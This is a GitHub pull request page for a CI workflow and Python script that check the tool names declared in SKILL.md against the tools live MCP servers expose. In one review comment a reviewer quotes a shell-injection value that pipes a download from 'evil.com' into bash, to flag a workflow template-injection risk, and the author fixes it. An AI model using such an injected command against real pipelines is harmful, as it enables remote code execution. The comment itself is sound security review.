Skip to content

ci: add MCP tool name validation against live servers#95

Merged
r2dedios merged 5 commits into
RHEcosystemAppEng:mainfrom
jordigilh:feat/mcp-tool-validation-ci
May 21, 2026
Merged

ci: add MCP tool name validation against live servers#95
r2dedios merged 5 commits into
RHEcosystemAppEng:mainfrom
jordigilh:feat/mcp-tool-validation-ci

Conversation

@jordigilh
Copy link
Copy Markdown
Contributor

Summary

  • Adds a CI check that starts each pack's MCP servers (from mcps.json) via podman and cross-references the allowed-tools declared in SKILL.md frontmatter against the actual tools exposed by the server
  • Catches tool name mismatches (e.g., pod_list vs pods_list) that pass all static linters but silently break skills at runtime
  • Uses a Kind cluster to provide a valid kubeconfig for MCP server startup

Motivation

While working on PRs #79 and #80, we discovered 6 tool name mismatches between our SKILL.md declarations and the actual MCP server tool registry. These went undetected by the existing skill-linter and compliance-check because they only validate static structure, not runtime tool availability.

SKILL.md declared Actual MCP tool
pod_list pods_list
pod_logs pods_log
get_metric_names (doesn't exist)
get_metric_metadata (doesn't exist)
get_series (doesn't exist)
query prometheus_query

Components

  • scripts/validate-mcp-tools.sh — Starts container-based MCP servers via podman, sends JSON-RPC initialize + tools/list, and validates each skill's allowed-tools
  • .github/workflows/mcp-tool-validation.yml — GitHub Actions workflow using Kind cluster + podman, triggers on changes to mcps.json or SKILL.md files

Test plan

  • Tested locally against rh-developer pack — correctly detected 6 mismatches in incident-triage (pre-fix) and passed debug-scc/debug-rbac (post-fix)
  • Verify workflow runs successfully in CI with Kind cluster
  • Verify credential-gated MCP servers (github, lightspeed-mcp) are gracefully skipped

Made with Cursor

jordigilh and others added 2 commits May 8, 2026 13:28
Adds a CI check that starts each pack's MCP servers (from mcps.json)
and cross-references the `allowed-tools` declared in SKILL.md
frontmatter against the actual tools exposed by the server.

This catches tool name mismatches (e.g., pod_list vs pods_list) that
would silently break skills at runtime but pass all static linters.

Components:
- scripts/validate-mcp-tools.sh: bash script that starts container-
  based MCP servers via podman, sends JSON-RPC initialize + tools/list,
  and validates each skill's allowed-tools against the response
- .github/workflows/mcp-tool-validation.yml: GitHub Actions workflow
  using Kind cluster + podman, triggers on changes to mcps.json or
  SKILL.md files

Co-authored-by: Cursor <cursoragent@cursor.com>
Replace bash script with a pure-Python implementation for cross-OS
portability. Key improvements:

- Response-based MCP communication via subprocess + select (no sleeps)
- Explicit image pulling with error handling
- JSON-RPC pagination support (follows nextCursor)
- Levenshtein-based "did you mean?" suggestions for mismatched tools
- Graceful handling of servers that exit immediately (missing creds)
- File path and line number in error output
- Logging of skipped non-container MCP servers

Workflow hardening:
- Pin all GitHub Actions to SHA
- Add permissions: contents: read
- Add concurrency group with cancel-in-progress
- Add timeout-minutes: 10
- Explicit KUBECONFIG capture from Kind
- Add workflow_dispatch pack input for manual runs
- Inline pack detection (remove dependency on detect-changed-packs.sh)

Co-authored-by: Cursor <cursoragent@cursor.com>
@dmartinol
Copy link
Copy Markdown
Collaborator

Hey @jordigilh thanks for your contribution to proactively catch these mismtaches!
To avoid risky changes, we decided to postpone commits that could affect the skill's execution post-Summit, hop e you can understand.

Apart from that, 2 comments on this awesome PR:
1- we should improve the suggestion mechanism to suggest matching names in case of missed toolset or wrong toolset or tool name. Maybe using semantic search with a small embedding model we can avoid coding complex match logic?
2- try to extend the check for non containerized commands (uvx, npm)

@jordigilh
Copy link
Copy Markdown
Contributor Author

Thanks @dmartinol — totally understand the post-Summit freeze. No rush on merging this one.

On your two suggestions:

  1. Semantic search for suggestions — interesting idea. The current Levenshtein approach catches simple typos (pod_listpods_list) but misses semantic gaps like queryprometheus_query. An embedding model would handle that better. I'll explore lightweight options (e.g., a small sentence-transformer or even TF-IDF over tool names + descriptions) as a follow-up so we don't add heavy dependencies to CI.

  2. Non-containerized commands (npx, uvx) — agreed, this would future-proof the check. Right now no skills declare allowed-tools referencing tools from npx-based servers, so there's zero false-positive risk from skipping them. But as more skills adopt allowed-tools, we'll want coverage. I'll look into adding Node.js to the CI environment and handling the different startup patterns.

Happy to iterate on both after Summit. Let me know if there's anything else you'd like adjusted in the meantime.

@dmartinol
Copy link
Copy Markdown
Collaborator

2. Non-containerized commands (npx, uvx) — agreed, this would future-proof the check. Right now no skills declare allowed-tools referencing tools from npx-based servers, so there's zero false-positive risk from skipping them. But as more skills adopt allowed-tools, we'll want coverage. I'll look into adding Node.js to the CI environment and handling the different startup patterns.

Thanks for being available to extend this solution! And yes, we'll also extend the coverage of allowed-tools fields early next week.

Comment thread scripts/validate_mcp_tools.py
@jordigilh
Copy link
Copy Markdown
Contributor Author

@dmartinol @r2dedios Thanks for the feedback on integrating this into the validate make target. Before pushing changes, I'd like to get your input on the approach since validate_mcp_tools.py has heavier prerequisites (podman + KUBECONFIG/Kind) than the existing validation steps.

Option A: Add it to make validate with graceful skip

The script would detect missing prerequisites (no podman, no KUBECONFIG) and exit 0 with a warning instead of failing. This keeps make validate and compliance-check.yml working as-is — the MCP step simply auto-skips when the infra isn't there. Locally, devs with podman get the full check; those without get a skip message.

  • Pro: Single make validate command always works everywhere
  • Con: Silent skipping can mask the fact that MCP validation didn't actually run

Option B: Standalone target + keep workflows separate

Add make validate-mcp-tools as its own target (supports PACK=rh-developer), but don't add it to make validate. The existing compliance-check.yml stays fast and lightweight (static checks only), while mcp-tool-validation.yml handles the runtime validation with its own podman/Kind setup and targeted triggers (mcps.json, SKILL.md changes).

  • Pro: Clean separation of static vs. runtime validation; no extra CI minutes on docs-only PRs
  • Con: make validate doesn't cover MCP tools — devs need to know to run make validate-mcp-tools separately

I'm leaning toward Option B since MCP validation is fundamentally a runtime check (starts containers, JSON-RPC handshake) while the other validate steps are static. But happy to go with either — what's your preference?

@dmartinol
Copy link
Copy Markdown
Collaborator

I'm leaning toward Option B since MCP validation is fundamentally a runtime check (starts containers, JSON-RPC handshake) while the other validate steps are static. But happy to go with either — what's your preference?

Hey @jordigilh, good catch!
Whatever the selected option (initially I opted for A, because I did not experience long waiting time during my tests, but B is fine as well), the important is to provide the developer with tools to identify the mismatches and to help him with the fix (e.g. extend the suggestion range).

BTW: other tools we should be considering are the CLI tools that are sometimes referred in the SKILL.md, like oc, but those are harder to be found with a python script.

- Add validate_mcp_tools.py to the main `validate` Makefile target
- Add standalone `validate-mcp-tools` target with PACK= filter support
- Add graceful prerequisite detection: script exits 0 with a SKIP
  message when podman or KUBECONFIG is unavailable, so `make validate`
  never breaks in environments without container tooling
- Improve tool name suggestions with substring/prefix matching and
  component overlap scoring alongside the existing Levenshtein distance

Co-authored-by: Cursor <cursoragent@cursor.com>
KUBECONFIG: ${{ env.KUBECONFIG }}
run: |
if [ "${{ github.event_name }}" = "workflow_dispatch" ] && [ -n "${{ inputs.pack }}" ]; then
python scripts/validate_mcp_tools.py "${{ inputs.pack }}"
Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Potential security injection risk. If someone introduces a bash command like foo"; curl evil.com/payload | bash; echo " it could create a huge mess. I propose using another EnvVar, so Github will use the value of ${{ inputs.pack }} always as Strings, and never a executable code.

  env:
    PACK: ${{ inputs.pack }}
  run: python scripts/validate_mcp_tools.py "$PACK"

Copy link
Copy Markdown
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Good catch — fixed in 1167429.

All ${{ }} expressions in run: blocks are now routed through env: vars:

  • inputs.packINPUT_PACK
  • github.base_refBASE_REF
  • steps.detect.outputs.packsCHANGED_PACKS
  • steps.detect.outputs.changedPACKS_CHANGED
  • github.event_nameEVENT_NAME

Shell only ever sees quoted env var references, never raw template interpolation.

sudo apt-get update -qq
sudo apt-get install -y -qq podman

- name: Create Kind cluster
Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Why the Kind cluster creation at this point? Is it for generating a kubeconfig file for the MCP? If we only want to get the tools list, we can use an empty kubeconfig and query the MCP for the Tools list and we will not need to setup a Kind cluster everytime

Copy link
Copy Markdown
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Great observation — you're right, tools/list is purely metadata and doesn't require cluster connectivity. Fixed in 1167429.

Removed the Kind cluster entirely and replaced it with a minimal dummy kubeconfig that satisfies the MCP server's startup requirement. This saves ~2 minutes of CI time per run and removes the helm/kind-action dependency.

jordigilh and others added 2 commits May 19, 2026 11:37
- Fix shell injection: route all ${{ }} expressions through env vars
  (inputs.pack, github.base_ref, steps.detect.outputs.packs)
- Remove Kind cluster: tools/list doesn't need cluster connectivity,
  use a dummy kubeconfig instead (~2 min CI savings)
- Remove unused `import re` and dead `TOOLS_LIST_MSG` constant
- Add error handling for malformed mcps.json files

Co-authored-by: Cursor <cursoragent@cursor.com>
- Fix race condition: replace time.sleep(0.5) with poll loop (10x100ms)
  for more reliable server startup detection
- Document platform requirement (Linux/macOS) in script docstring
- Document fetch-depth: 0 rationale in workflow comment
- Simplify workflow dispatch logic with early-exit for unchanged PRs
- Update Makefile messaging to clarify graceful skip behavior

Co-authored-by: Cursor <cursoragent@cursor.com>
Copy link
Copy Markdown
Contributor

@r2dedios r2dedios left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

LGTM 🚀

@r2dedios r2dedios merged commit fd3026e into RHEcosystemAppEng:main May 21, 2026
2 checks passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

3 participants